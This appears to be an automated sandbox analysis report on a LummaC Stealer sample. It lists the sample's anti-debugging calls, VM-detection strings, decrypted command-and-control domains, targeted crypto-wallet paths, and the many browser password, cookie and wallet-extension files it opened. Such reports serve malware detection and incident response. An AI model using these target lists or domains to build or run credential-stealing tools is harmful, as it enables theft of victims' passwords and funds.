Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: 2889.tmp.exe, 00000003.00000003.1444714258.0000000002D27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696501413p
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 2889.tmp.exe, 00000003.00000003.1444887384.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3C3

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC4E

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0042FE4F mov eax, dword ptr fs:[00000030h]	0_2_0042FE4F
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00560083 push dword ptr fs:[00000030h]	0_2_00560083
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_021200B6 mov eax, dword ptr fs:[00000030h]	0_2_021200B6
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020F092B mov eax, dword ptr fs:[00000030h]	0_2_020F092B
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020F0D90 mov eax, dword ptr fs:[00000030h]	0_2_020F0D90

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_0043BBB1 GetProcessHeap,

0_2_0043BBB1

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3C3
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104C3
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00410656 SetUnhandledExceptionFilter,	0_2_00410656
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F907
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0211A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0211A62A
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0210072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0210072A
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020FFB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_020FFB6E
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_021008BD SetUnhandledExceptionFilter,	0_2_021008BD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: robinsharez.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: handscreamny.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: chipdonkeruz.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: versersleep.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: crowdwarek.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: apporholis.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: femalsabler.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: soundtappysk.shop
Source: 2889.tmp.exe, 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: skidjazzyric.click

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Process created: C:\Users\user\AppData\Local\Temp\2889.tmp.exe "C:\Users\user\AppData\Local\Temp\2889.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_0041076B cpuid

0_2_0041076B

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_004351B0
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_0043B272
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_0043B2BD
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_0043B358
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3E5
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_0043B635
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B75E
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_0043B865
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B932
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_00434DBD
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043AFFA
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0212B261
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_02125024
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_02125417
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_0212B4D9
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_0212B524
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: EnumSystemLocalesW,	0_2_0212B5BF
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_0212BACC
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0212BB99
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_0212B892
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,	0_2_0212B89C
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0212B9C5

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_004103BD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103BD

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163DA

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 2889.tmp.exe PID: 7940, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 2889.tmp.exe, 00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: 2889.tmp.exe, 00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 2889.tmp.exe	String found in binary or memory: Jaxx Liberty
Source: 2889.tmp.exe, 00000003.00000002.1792386987.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 2889.tmp.exe, 00000003.00000002.1792386987.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 2889.tmp.exe	String found in binary or memory: ExodusWeb3
Source: 2889.tmp.exe, 00000003.00000002.1792386987.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 2889.tmp.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2889.tmp.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
